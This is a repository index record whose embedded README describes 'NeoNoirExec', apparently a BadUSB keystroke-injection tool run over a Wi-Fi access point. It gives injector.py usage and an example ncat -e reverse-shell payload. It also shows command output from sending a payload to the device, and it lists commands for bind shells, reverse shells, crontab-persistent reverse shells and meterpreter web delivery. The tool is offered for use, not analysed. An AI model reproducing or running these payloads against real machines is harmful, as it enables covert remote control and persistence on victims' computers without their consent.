{"id":27392418,"url":"https://github.com/byt3n33dl3/neonoirexec","last_synced_at":"2025-04-13T21:51:42.456Z","repository":{"id":222948653,"uuid":"758814863","full_name":"byt3n33dl3/NeoNoirExec","owner":"byt3n33dl3","description":"Release Neo the Evil Ducky, A scripts into any Hardware or drive Devices.","archived":false,"fork":false,"pushed_at":"2024-07-11T12:19:20.000Z","size":22449,"stargazers_count":13,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-06T02:48:49.965Z","etag":null,"topics":["bad-usb","rubber-ducky","scripts","straightforward","trust-attack"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"lgpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/byt3n33dl3.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-02-17T06:42:03.000Z","updated_at":"2025-03-09T23:16:27.000Z","dependencies_parsed_at":"2024-07-11T18:44:57.119Z","dependency_job_id":null,"html_url":"https://github.com/byt3n33dl3/NeoNoirExec","commit_stats":null,"previous_names":["sulaimannabdul/badges-prj","pxcs/coreneoexec","byt3n33dl3/coreneoexec","byt3n33dl3/neoexec","byt3n33dl3/neonoirexec"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3n33dl3%2FNeoNoirExec","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3n33dl3%2FNeoNoirExec/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3n33dl3%2FNeoNoirExec/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3n33dl3%2FNeoNoirExec/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/byt3n33dl3","download_url":"https://codeload.github.com/byt3n33dl3/NeoNoirExec/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248788855,"owners_count":21161726,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bad-usb","rubber-ducky","scripts","straightforward","trust-attack"],"created_at":"2025-04-13T21:51:41.730Z","updated_at":"2025-04-13T21:51:42.449Z","avatar_url":"https://github.com/byt3n33dl3.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"**Warning** : Newest version of Neo Toolkit expect the Neo to have a firmware in the prefered language, alternatively you can force the french keyboard with the english firmware using the `--force` arguments. For more customization informations go to swisskyrepo.github.io .\n\nWhere to buy a Neo injector ? I got mine from [Aliexpress](https://www.aliexpress.com/item/Cactus-Micro-compatible-board-plus-WIFI-chip-esp8266-for-atmega32u4/32318391529.html)\n\n## How to use the script\n```c\npython3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads / windows.txt -h                 \nusage: injector.py [-h] [-v] [--host [HOST]] [--port [PORT]]\n                       [--user [USER]] [--pass [PASS]] [--panel [PANEL]]\n                       [--payload [PAYLOAD]]\n\noptional arguments:\n  -h, --help           show this help message and exit\n  -v                   Verbosity of the output\n  --host [HOST]        Host reverse-shell\n  --port [PORT]        Port reverse-shell\n  --user [USER]        Wifi Panel username\n  --pass [PASS]        Wifi Panel password\n  --panel [PANEL]      Wifi Panel password\n  --payload [PAYLOAD]  Payload template\n```\n\nTargeting a Windows OS\n```c\npython3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt\n```\n\nSend a simple reverse-shell payload\n```\n$ python3 injector.py -v --host 127.0.0.1 --port 4444\n     -------------------------------------------------------------\n      Neo injector - You need to be connected to the Exploit AP\n     -------------------------------------------------------------\n                   __   °\n                 \u003c(o )___\n                  ( ._\u003e /\n                   `---'                      @pxcs\n\nEnter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL \u0026'\n-------------------------------------------------------------------\n\u003e\u003e\u003e reverse\nPayload:\nRem:Default Payload\nPress:130+195\nCustomDelay:1000\nPrint: bash SHELL:14\nCustomDelay:1000\nPress:176\n\nSending payload to http://192.168.1.1/runlivepayload\n```\n\n## Payloads and commands\n| Commands       | Description                           |\n| :------------- | :-------------                        |\n| bind           | initiate a bind shell on results.port |\n| reverse        | initiate a reverse shell on results.host and results.port |\n| crontab        | set up a crontab reverse shell on results.host and results.port |\n| meterpreter | use exploit script / web delivery with a posh-payload    |\n| send some text | send the specified text              |\n| h              | help                                 |\n| q              | quit                                 |\n\nYou can change the options with `SET option_name option_value`\n```c\n\u003e\u003e\u003e set host 127.0.0.1\n\u003e\u003e\u003e set port 4444\n```\n\nThanks to: \n- swisskyrepo\n- metasploit\n- pxcs\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbyt3n33dl3%2Fneonoirexec","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbyt3n33dl3%2Fneonoirexec","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbyt3n33dl3%2Fneonoirexec/lists"}